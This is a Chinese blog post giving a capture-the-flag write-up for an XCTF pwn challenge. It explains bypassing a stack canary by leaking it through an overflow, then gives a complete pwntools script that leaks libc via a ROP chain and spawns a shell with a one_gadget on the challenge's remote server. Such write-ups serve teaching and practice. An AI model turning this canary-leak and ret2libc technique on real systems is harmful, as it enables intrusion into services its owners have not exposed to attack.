0
点赞
收藏
分享

微信扫一扫

[XCTF-pwn] 15_厦门邀请赛-pwn

月白色的大狒 2022-03-11 阅读 43
安全pwn

同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。

这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复

from pwn import *

'''  
patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
patchelf --add-needed /home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830
else:
    p = remote('111.200.241.244', 60088)
    libc_elf = ELF('./libc-2.23.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830


elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

pop_rdi = 0x0000000000400a93 # pop rdi ; ret
pop_rsi = 0x0000000000400a91 # pop rsi ; pop r15 ; ret
payload = b'A'*(0x88+1) 
p.sendlineafter(b">> ", b'1')
p.send(payload)  #将canary第1字符置A再show得到canary

p.sendlineafter(b">> ", b'2')
p.recvuntil(b'A'*(0x88+1))  
canary = b'\x00' + p.recv(7)
print('canary:', hex(u64(canary)))

#再将rop写到返回地址,泄露libc
payload = b'A'*(0x88) + canary + b'\x00'*8 + flat(pop_rdi, elf.got['puts'], elf.plt['puts'], 0x400908)
p.sendlineafter(b">> ", b'1')
p.send(payload)

p.sendlineafter(b">> ", b'3')

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

#最后写one_gadget
#payload = b'A'*(0x88) + canary + b'\x00'*8 + flat(pop_rdi+1, pop_rdi, next(libc_elf.search(b'/bin/sh\x00')),libc_elf.sym['system'])
payload = b'A'*(0x88) + canary + b'\x00'*8 + p64(libc_base + one[0])
p.sendlineafter(b">> ", b'1')
p.send(payload)
p.sendlineafter(b">> ", b'3')

p.sendline(b'cat flag')
p.interactive()

坑:这题在得到libc后写system(bin/sh)会报错,但写one_gadget能通过,没开理啊!

举报

相关推荐

0 条评论